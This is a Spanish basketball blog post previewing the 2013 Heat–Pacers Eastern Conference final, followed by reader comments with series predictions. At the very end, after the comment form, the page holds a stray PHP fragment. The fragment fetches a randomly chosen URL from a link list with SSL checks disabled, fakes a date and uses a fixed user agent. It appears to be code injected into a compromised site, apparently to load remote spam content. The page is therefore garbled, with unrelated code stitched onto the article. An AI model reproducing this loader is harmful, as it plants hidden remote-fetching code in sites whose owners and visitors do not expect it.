Previa Miami Heat – Indiana Pacers

21 de May de 2013 por Esteban

Si alguien en el Este puede ponerles las cosas complicadas a los Heat son estos Pacers así que bienvenida la serie. Los Knicks son demasiados parecidos en su juego a Miami y a la vez demasiado inferiores. Los Pacers si bien siguen siendo inferiores a los Heat (como todos los equipos de la NBA) al menos tienen un estilo bien diferente que puede complicarle las cosas a Spoelstra (y este no es un Popovich que digamos). De todas maneras, esto no significa que los Pacers sean candidatos. Incluso para mí resulta casi imposible que los Pacers puedan vencer a los Heat a 7 juegos pero sin duda robarán alguno, exigirán físicamente al máximo a LeBron y compañía y les darán un buen susto.

Miami es un rival a la medida de los Pacers porque, al igual que los Knicks, juegan con un alero en la posición de ala-pivote y para más ayuda, con un ala pívot liviano en el puesto de pívot. Los Pacers, con un 4 clásico como West y un centro clásico como Hibbert, ya les dieron dolores de cabeza el año pasado y este año parecen más enteros para poner en problemas a los candidatos al título.

La clave sin ninguna duda será nuevamente Roy Hibbert. Ahora sí debe ser tan determinante como pueda ser un centro de élite frente a Chris Bosh. Tan determinante que obligue a Spoelstra a mandar a cancha muchos minutos a Joel Anthony y así romper un poco el juego abierto que practican los Heat con Battier como lanzador desde las esquinas. Con Anthony en cancha en lugar de Battier, Miami pierde un lanzador estelar, velocidad en el contraataque y los vuelve un equipo algo más terrenal.

Esa es el arma con la que cuentan los Pacers y no mucho más. Si no ganan por abrumadora ventaja en los rebotes y lastiman con faltas a los jugadores de Miami no creo que tengan con qué sorprender a un equipo que ha ganado 47 de los últimos 50 juegos.

Las virtudes del Heat son las que les han hecho dos veces finalistas de la NBA, campeones vigentes y titulares del mejor récord de la regular y de los Playoffs. ¿Se puede decir algo nuevo de ellos? Yo no. Sobre sus debilidades, podríamos intentar hablar de darle la izquierda a LeBron o golpearlo cada vez que tome la bola para que no entre en ritmo, pero los resultados no serían muy alentadores.

El Heat es demasiado buen equipo y tienen demasiados recursos para los Pacers, quienes, si bien son excelentes defensores, son algo limitados en ataque y enfrentarán una defensa de élite. 

Claves de la eliminatoria

  • El juego interior: Si los Pacers quieren ganar la serie deben hacer un daño irreparable en el juego interior de Miami. West ya se hizo una panzada con Battier los Playoffs pasados y Hibbert viene de merendarse a un tal Chandler, por lo que Bosh no debería ser un obstáculo. Recuerdo estar viendo un Heat vs Lakers, cuando un genio como D´Antoni tuvo una idea brillante (y obvia): darle todos los balones a sus dos gigantes para ganar la zona. Pero esos pases eran forzados y previsibles, y los Heat se cansaron de cortarlos uno tras otro y terminar anotando en contragolpe. Los Pacers no tendrán a Gasol y Howard bajo los aros pero tienen una circulación de bola muy superior. Saben cómo hacer llegar la pelota a su internos y éstos saben sacarla para revertirla cuando es lo que demanda la jugada.
  • Los rebotes: Otra vez, igual que frente a los Knicks, los Pacers tiene superioridad de tamaño, no tanta pero la tienen. Son un gran equipo reboteador frente a uno muy malo. Si los Pacers dominan como deberían y se hacen con muchos rebotes ofensivos, pueden tener alguna chance.
  • LeBron James:  “El Rey” se vio algo más terrenal frente a la excelsa defensa de los Bulls y ahora deberá enfrentarse a otra defensa temible y a un defensor tan fuerte y largo como él que viene de jugar gran defensiva frente a otro astro como Carmelo Anthony. Si LeBron logra dominar a Paul George y no es intimidado por Hibbert a la hora de penetrar, la serie está sentenciada, pero si los Pacers logran controlarlo, George sacarlo de ritmo y Hibbert lo intimida y lo obliga a tirar a distancia puede haber alguna esperanza.

Pronóstico: Heat 4 – Pacers 2

Comenta

22 comentarios a esta entrada

  1. Esteban dice:
    #1

    El titulo de la serie debio ser david contra goliat, aunque dudo q tenga el mismo final que aquella batalla epica

      Citar

  2. Simon dice:
    #2

    Yo veo un 4-3 cada equipito ganando en casa. En Miami con marcadores altos y en Indiana marcadores a 75/80 puntos…

      Citar

  3. Rompe dice:
    #3

    El año pasado hubo una serie muy igualada, en gran parte, porque Bosh estuvo ausente. Este año los Pacers son superiores, sí, pero también estará Chris en el otro lado. Así que yo creo que no se acercará al resultado del año anterior y será más fácil para los actuales campeones.

      Citar

  4. Laker1624 dice:
    #4

    Creo que esta eliminatoria puede ser en parte similar a la final de la conferencia oeste. Digo esto porque pienso que el factor determinante de este duelo será la falta de capacidad anotadora de los Pacers, que si bien los considero grandes defensores capaz de ponerles las cosas realmente difíciles a los Heat, dudo mucho que puedan competir con Miami en el aspecto ofensivo. Supongo que Indiana intentara jugar a marcadores bajos, y en ese terreno creo que podrían tener ventaja, pero dudo que puedan conseguirlo teniendo enfrente a James, que en su versión “terrenal” (por decirlo de alguna manera) ya me parece el mejor jugador del mundo.

    Creo que ofensivamente hablando, Grizzlies y Pacers no son grandes equipos, en mi opinión Memphis tiene mas capacidad anotadora en el juego interior, pero no creo que le sea suficiente para remontar a San Antonio
    .

      Citar

  5. rumbero dice:
    #5

    Rompe:
    El año pasado hubo una serie muy igualada, en gran parte, porque Bosh estuvo ausente. Este año los Pacers son superiores, sí, pero también estará Chris en el otro lado. Así que yo creo que no se acercará al resultado del año anterior y será más fácil para los actuales campeones.

    Y no nos olvidemos del factor Wade que nadie ha mencionado aún y yo le recuerdo unas semifinales a la altura de las de Lebron. Va a tener que estar bien para echarle un cable al King con la defensa que presumiblemente vamos a ver por parte de los Pacers. Yo lo veo casi más fundamental que la presencia de Bosh.

      Citar

  6. Sancho88 dice:
    #6

    Por cierto, el análisis bien, pero olvídate Esteban de ver al cacotas de Anthony no jodas. Para algo creo que está Chris Andersen no? Además, Battier y Lebron jugarán de 4 y Bosh y Andersen de 5, y eso va a ser así. Ah, y el año pasado Battier lo hizo decentemente contra West. No sé, quizá los primeros partidos Indiana lo bordó, fue una serie perra, con hostias por todos lados pero luego apareció la figura de Wade y los Pacers se fueron a tomar por culo. Este año Hibbert parece ya un jugador de playoffs, está Stephenson… pero Lebron se va a comer a George con patatas. 4-2 veo yo también, pero veo la serie un poco distinta a ti

      Citar

  7. GreenPride dice:
    #7

    Bueno pues creo que lo que sí estamos de acuerdo es que esta es la primera piedra seria del camino para los Heat.
    En principio Miami es claro favorito pero hay una serie de cosas que pueden hacer que la serie sea larga y más interesante de lo que muchos pueden suponer:
    1) Rebotes y juego interior: Está claro que en la pintura los Pacers son tremendamente superiores a un equipo que es el peor de la liga en rebotes y juega sin 5 puro. La misión de los Pacers es repetir lo que hicieron contra los Knicks. Hibbert debe dominar las pinturas tanto en ataque como en defensa, metiendo en faltas a Bosh e intentando que las penetraciones de LeBron y Wade encuentren una muralla dentro de la zona. Si lo consigue, los exteriores de los Pacers podrán cuidar los triples de Allen, Battier y cia y eso puede dificultar mucho el juego de ataque de los Heat.
    2) Segundas opciones: Ligado con el rebote los Pacers que no son un equipo brilllante en ataque deben conseguir atacar el rebote ofensivo para tener segundas opciones que palien sus malos porcentajes.
    3) Control del juego: Cuanto más lento se juegue y a menos puntos mejor para los Pacers. Deben controlar las pérdidas y de nuevo acosar el rebote para evitar al máximo los puntos en contraataque y juego abierto de los Heat y obligarlos a jugar en estático. Especialmente importante el tema de las pérdidas porque la defensa Heat buscará anticiparse y evitar que reciban los interiores de los Pacers ya que una vez con la bola tendrán clara ventaja.
    4) Dureza mental y cluch time: El principal problema de los Pacers a parte de conseguir puntos puede ser aguantar los momentos comprometidos sin tener un referente claro al que dar el balón cuando haya problemas o en los momentos finales. Ante los Knicks no hubo partidos igualados al final pero si quieren hacer algo en esta eliminatoria tendrán que hacerse valer en momentos más comprometidos.
    5) Wade: Si está al nivel que mostró ante Chicago puede haber eliminatoria, si se recupera y ayuda en ataque a LeBron todo será más fácil para los Heat

      Citar

  8. GreenPride dice:
    #8

    Por cierto que no he dado mi pronóstico: 4-2 con sudor para los Heat y muchos palos

      Citar

  9. Denise dice:
    #9

    4-1 para Miami con 2 partidos ganando facil por un margen de entre 15-20 puntos.
    Miami no es santo de mi devoción pero lo que no quiero es que los Spurs se lleven el anillo y no veo a Indiana capaz de derrotarlos en caso de que los texanos eliminen a los osos.
    Además, los Heat tienen jugadores que me caen bien como Miller, Lewis y Battier.

      Citar

  10. Esteban dice:
    #10

    Sancho88:
    Por cierto, el análisis bien, pero olvídate Esteban de ver al cacotas de Anthony no jodas. Para algo creo que está Chris Andersen no? Además, Battier y Lebron jugarán de 4 y Bosh y Andersen de 5, y eso va a ser así. Ah, y el año pasado Battier lo hizo decentemente contra West. No sé, quizá los primeros partidos Indiana lo bordó, fue una serie perra, con hostias por todos lados pero luego apareció la figura de Wade y los Pacers se fueron a tomar por culo. Este año Hibbert parece ya un jugador de playoffs, está Stephenson… pero Lebron se va a comer a George con patatas. 4-2 veo yo también, pero veo la serie un poco distinta a ti

    considero que anderson no tiene el tamaño para defender a HIBBERT ni la fuerza, si no mira como le fue en los minutos que lo marco MARTIN

    si hibbert logra ser dominante, solo joel anthony esta a la altura fisica del pivotde inidiana

      Citar

  11. lost dice:
    #11

    4-0.

      Citar

  12. Esteban dice:
    #12

    4-0? no lo creo, estoy ansioso por ver esta serie, cada minuto que pasa estoy mas convecido que sera igualadisima

    espero no equivocarme

    pero, hay duelos que hacen ilusionarse con un gran choqye hoy,

    stephenson y george, frente a wade y james, quiza la mejor dupla defensiva perimetral de la competencia, contra la sin dudas mejor dupla ofensiva

    por otra parte, que hara Roy Hibbert? he leido que la eficiencia de los Pacers frente al heat con el en cancha disminuye, por que no puede marcar en el perimetro a bosh quin saldra mucho, pero de ese modo que se olviden el heat de rebotes ofensivos

    la banca de los pacers es penosa, mientras que el heat tiene un cole efectivo, lewis que pueden lanzar, haslem un interno de elite, lo que puede aportar andersen y si es ilimunado el mismso miller, a todo ese sumemosle a Ray allen que seria es escolta titular de los pacers
    indiana cuanta con d.j. augustine y hasbrougt y mahinmi mediamanete utiles, young, pendergraf y green son casi testimoniales

    west vs battier… deberia ser un abuso por parte de west, veremos si sucede

    que comience, YA!!!!!!!

      Citar

  13. Esteban dice:
    #13

    declaraciones cruzadas entre vogel y james, stephenson y su famoso gesto sobre leborn, rensillas de varios tipos

    muchos creen que los pacers siguen siendo una cenicienta, lo hicieron creer el año pasado, donde el mudno consideraba que los pacers deberian estar contentos de llegar donde llegaban y que no debian mirar mas alla de eso

    luego de poner la serie 2-1 el año pasado, parecia que debiera ser una conmocion por lograr ago tan dificil, pero david west le prohibio a sus compañeros festejar y les ordeno ir rapido a las duchas

    lego del partido dijo “solo ganamos un juego, el camino es largo”

    los pacers fueron eliminados 4-2, pero el mensaje era claro, ellos son mejores pero venimos a jugar, no vamos a ser su partener, queremos pasar de ronda

    los pacrs se han metalizado para ello, golpearon y le faltaron el respeto al Heat (recuerden las tecnicas de granger), y creo que sera la serie que veremos

    nadie en indiana se conforma con lo logrado de a momento, el objetivo es la final de la NBA

      Citar

  14. L.Casei dice:
    #14

    Yo veo a los Pacers ganando hoy… pero perdiendo la serie… en 5 ó 6 partidos.. ya se sabe lo q pasa cuando LeBron pierde el primer partido de una serie… mejor no enfadarle…vaya máquina el de Akron, Oh.
    Si gana hoy IND me gano 40 euracos (he apostado 10€…). A fuego con ellos.

    Lo q parece claro es que los Pacers van a ser candidatos a todo en el próximo lustro… a no ser q tengan la desgracia que tuvo Portland como equipo joven y con un potencial enorme hace precisamente unos 5 años, ya sabéis: Oden, Roy… lo nunca visto.
    Os imagináis lo que hubiera sido un equipo este año sin lesiones con Lillard, Roy, Batum, Aldridge y Oden? más Maynor, Matthews, Claver, JJ Hickson y Meyers Leonards…? Pero los sueños, sueños son y mis Blazers se convirtieron en una pesadilla…
    Suerte, Indiana.

      Citar

  15. maravich dice:
    #15

    Esteban: West vs. Battier?
    Yo veo un emparejamiento Shane vs. a Paul George y Haslem vs. West… sería lo lógico, digo yo…
    Todo lo q no sea q Miami no gane el anillo sería un sorpresón… Simplemente no va a ocurrir.

      Citar

  16. Jose Luis dice:
    #16

    Dudo que hubieran escogido a Lillard de funcionar bien Roy y Oden… no habrían estado tan abajo en el draft. Incluso quizá tampoco tendrían a Batum, mucho menos a Leonard o Hickson.

      Citar

  17. maravich dice:
    #17

    Sí sería posible, ya que hubieran traspasado tras renovar a gente como Bayless, Webster, Outlaw, Rudy, CJ Walace o Camby, que habrían seguido en el equipo hasta este año ya q sería un equipo hecho para ser campeón y no lo han hecho porque desde 2011 se centraron en reconstruir tras volver a empezar sin Roy ni Oden… traspasando a un par de estos habrían conseguido a un pick #6 como fue Lillard… y los números de las tablas cuadrarían… créeme, soy un blazermaniac y lo he analizado bastantes veces… total para nada, lesión tras lesión y nada más…

      Citar

  18. Jose Luis dice:
    #18

    No creo que por esos 6 jugadores que me has dicho, hubieras conseguido un pick6…

    ¿Quién va a traspasar un pick6 por esos jugadores?

    Bayless no es más que un comboguard suplente anotador.
    Webster, un alero de los que hay decenas.
    Outlaw, de estos hay cientos.
    Rudy, de estos también hay decenas.
    CJ Wallace… de estos también hay cientos.
    Marcus Camby, pocos picks ibas a sacar por él, aparte a éste lo querrían en todo caso equipos que luchen por anillo, y esos equipos no tienen buenos picks.

      Citar

  19. Jose Luis dice:
    #19

    Por otro lado, ¿habéis visto la locura de calendario de NBA ahora mismo?

    El Oeste ya ha jugado dos partidos de Finales de Conferencia mientras el Este debuta hoy. Si Spurs ganasen 4-0 (muy improbable) y el Este se fuera a 7 partidos… ¿cuánto tiempo descansarían los Spurs antes de las Finales? Los Spurs acabarían el lunes 27 de mayo mientras el Este acabaría el… 3 de Junio! Eso haría que las Finales empezasen probablemente el día 6, con lo que los Spurs llevarían 10 días sin competir… un despropósito.

      Citar

  20. Esteban dice:
    #20

    Jose Luis:
    Dudo que hubieran escogido a Lillard de funcionar bien Roy y Oden… no habrían estado tan abajo en el draft. Incluso quizá tampoco tendrían a Batum, mucho menos a Leonard o Hickson.

    coincido, si los blazers tienen algo de talento hoy es justamente por que oden y roy no funcionaron, sino leonard y lillard no estarian alli

    incluso con dos contratos maximos como roy y oden, sumandole a aldrigue, no podrian haber renovado a batum y quiza tampoco a mathews

    eso solo es para dejar en claro que todos juntos no podrian estar, pero si oden hubiese sido lo que se esperaba y roy no hubiese tenido lesiones, sumados a aldrigue, con ellos tres ya tendrian equipo para ir por el titulo, por mas que quedaran malos jugadores en otras posicones, lease, andre miller en la base, webster de escolta y una banca con camby y rudy fernandez

      Citar

  21. L.Casei dice:
    #21

    Que LeBron James sea tan bueno no tiene precio, como las mastercard…
    Bueno en mi caso sí tiene precio… os decía ayer, 40 € q no he ganado… por una prórroga… y por la defensa de Indiana, una bandeja en el último segundo por mucho James q sea… ha entrado como cuchillo en mantequilla… y yo perdiendo mi dinero jeje…
    En cuanto a los Blazers, imposible saber qué hubieran hecho con Roy y Oden ok… pero el dueño es un tal Paul Allen q es un fanático q cuando tenga q pagar luxury tax con tal de ganar el anillo pagará lo q sea… a su lado Cuban es un mendigo…
    Y yo lamentándome por 40 euritos…
    Grande, Indiana.

      Citar

  22. Nacho dice:
    #22

    Jose Luis:
    Por otro lado, ¿habéis visto la locura de calendario de NBA ahora mismo?

    El Oeste ya ha jugado dos partidos de Finales de Conferencia mientras el Este debuta hoy. Si Spurs ganasen 4-0 (muy improbable) y el Este se fuera a 7 partidos… ¿cuánto tiempo descansarían los Spurs antes de las Finales? Los Spurs acabarían el lunes 27 de mayo mientras el Este acabaría el… 3 de Junio! Eso haría que las Finales empezasen probablemente el día 6, con lo que los Spurs llevarían 10 días sin competir… un despropósito.

    Pero es que si fuera al revés ocurriría lo mismo. Al final si terminan las series en los mismos partidos, solo hay un día de ventaja a favor del Oeste (en cuanto a descanso.
    Al terminar la serie de Indiana más tarde el Este se retrasó Por eso juegan toda las finales cada dos días. y por eso ese descanso entre el 2ª y 3ª de la serie del Oeste.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>